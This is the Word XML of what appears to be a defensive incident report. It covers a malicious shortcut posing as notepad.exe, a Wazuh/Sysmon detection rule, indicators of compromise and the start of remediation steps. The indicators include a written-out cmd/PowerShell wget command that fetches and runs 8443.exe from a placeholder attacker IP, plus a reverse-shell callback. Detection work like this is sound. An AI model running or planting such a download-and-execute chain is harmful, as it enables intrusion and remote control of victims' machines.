    <w:p w:rsidR="53BB567B" w:rsidP="53BB567B" w:rsidRDefault="53BB567B" w14:paraId="6758E095" w14:textId="35E6B46B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Custom Rule:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="53BB567B" w:rsidP="53BB567B" w:rsidRDefault="53BB567B" w14:paraId="554729C0" w14:textId="7B27300E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;group name="sysmon,initial_access,malware_execution,"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="53BB567B" w:rsidP="53BB567B" w:rsidRDefault="53BB567B" w14:paraId="6A7878F6" w14:textId="565162B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="53BB567B" w:rsidP="53BB567B" w:rsidRDefault="53BB567B" w14:paraId="23DA585E" w14:textId="4D43B03D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;rule id="100001" level="12"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="53BB567B" w:rsidP="53BB567B" w:rsidRDefault="53BB567B" w14:paraId="2439A9B1" w14:textId="008EC064">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;if_sid&gt;61603&lt;/if_sid&gt; &lt;field name="win.eventdata.parentImage"&gt;\\cmd.exe&lt;/field&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="53BB567B" w:rsidP="53BB567B" w:rsidRDefault="53BB567B" w14:paraId="3E232EE6" w14:textId="2377D97D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;field name="win.eventdata.commandLine" type="pcre2"&gt;powershell\.exe.*wget.*http.*\.exe&lt;/field&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="53BB567B" w:rsidP="53BB567B" w:rsidRDefault="53BB567B" w14:paraId="0640E0AF" w14:textId="4741CDA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;description&gt;Suspicious Process Creation: PowerShell downloading and executing an EXE via CMD (Possible Spearphishing/LNK payload)&lt;/description&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="53BB567B" w:rsidP="53BB567B" w:rsidRDefault="53BB567B" w14:paraId="33CD60AF" w14:textId="35C16DDF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="53BB567B" w:rsidP="53BB567B" w:rsidRDefault="53BB567B" w14:paraId="432F969E" w14:textId="0502B6F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;id&gt;T1566.001&lt;/id&gt; &lt;id&gt;T1059.001&lt;/id&gt; &lt;id&gt;T1059.003&lt;/id&gt; &lt;id&gt;T1105&lt;/id&gt;     &lt;/mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="53BB567B" w:rsidP="53BB567B" w:rsidRDefault="53BB567B" w14:paraId="31D25B1E" w14:textId="18B9CE4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/rule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="53BB567B" w:rsidP="53BB567B" w:rsidRDefault="53BB567B" w14:paraId="05F3C01C" w14:textId="183FE755">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="53BB567B" w:rsidP="53BB567B" w:rsidRDefault="53BB567B" w14:paraId="54A79EB1" w14:textId="0A20FA92">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="3B143611" w14:textId="6DA029A7">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="72922A69" w14:textId="248D166D">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Indicators of Compromise (IoCs)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="26D9C499" w14:textId="547BD990">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Host-based IoCs (file locations + expected values)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="2F81D0F9" w14:textId="796B1473">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="3FB709F1" w14:textId="5B4221CF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Malicious shortcut file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="440C1D97" w14:textId="64720190">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Location: C:\icrm\notepad.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="019E91C7" w14:textId="02CA8C4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Expected value: Type is “Shortcut (.lnk)” (not a legitimate Notepad binary)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="1874B68E" w14:textId="3F6D691D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Suspicious behaviour: shortcut masquerades as a trusted Windows executable name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="161B07E8" w14:textId="347C74DC">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="1E83EB2B" w14:textId="5689BAF7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Downloaded payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="5CA146BF" w14:textId="7CBC7DE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Location: C:\icrm\8443.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="7BC67478" w14:textId="56FDA80F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Expected value: created shortly after shortcut click; may be removed after execution (cleanup)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="761AF81D" w14:textId="5CA667B8">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="63C4D4A8" w14:textId="2955A3A4">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Command-line / configuration IoCs (expected values)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="058E84A1" w14:textId="25384490">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="6CD2D062" w14:textId="45DE9364">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Shortcut target contains download-and-execute chain:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="32172072" w14:textId="59728E90">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cmd.exe /c powershell.exe wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId35">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;ATTACKER_IP&gt;/8443.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> -OutFile C:\icrm\8443.exe &amp;&amp; C:\icrm\8443.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="4FEE7E5E" w14:textId="7D29BC3B">
      <w:pPr>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="63662B7B" w14:textId="2AB68A16">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Suspicious process chain (expected telemetry pattern):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="03D5520C" w14:textId="0CA39CB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:t>explorer.exe (or mail client) → cmd.exe → powershell.exe → 8443.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="144AA8F5" w14:textId="116F7018">
      <w:pPr>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="3D5FAC78" w14:textId="7DC5066F">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Network IoCs (expected values)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="66AA82C2" w14:textId="49F2C009">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="3EE12236" w14:textId="0E00C85D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Payload retrieval:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="32351CC3" w14:textId="02DB8642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:t>Source: &lt;VICTIM_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="57347234" w14:textId="1C75717F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:t>Destination: &lt;ATTACKER_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="2723FAD3" w14:textId="01FC59D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:t>Request: GET /8443.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="5C1BD3C5" w14:textId="590BAD68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:t>Expected value: HTTP 200 responses in server logs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="27A73AAF" w14:textId="61BE6875">
      <w:pPr>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="31A15455" w14:textId="5770A262">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Reverse shell callback:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="61FE7AD7" w14:textId="5689F39D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:t>Source: &lt;VICTIM_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="72F9DD5E" w14:textId="33E0A09D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:t>Destination: &lt;ATTACKER_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="6CF3C253" w14:textId="59B2BD7D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:t>Port: 8443/TCP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="6845FCFF" w:rsidRDefault="00695885" w14:paraId="43A7C0C5" w14:textId="6F839A06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C3354B" w:rsidP="00C3354B" w:rsidRDefault="6845FCFF" w14:paraId="159B1598" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896683" w:id="19"/>
      <w:commentRangeStart w:id="20"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation </w:t>
      </w:r>
      <w:commentRangeEnd w:id="20"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="20"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Strategies</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="51A27F43" w14:textId="3B3C9A3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Containment (stop the attack)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="01D13EAD" w14:textId="3A5F7801">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="14B92D17" w14:textId="5CECB4E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Immediately isolate the affected host from the network (disconnect or EDR isolate).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="548AB15A" w14:textId="21760D52">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="7B5FBC0A" w14:textId="40231503">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Terminate suspicious processes if active:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="74E4B8BE" w14:textId="10A5EF04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>cmd.exe, powershell.exe, and unknown executables related to the incident.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="31F484AA" w14:textId="7B8B4A73">
      <w:pPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="08F2829D" w14:textId="74488322">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
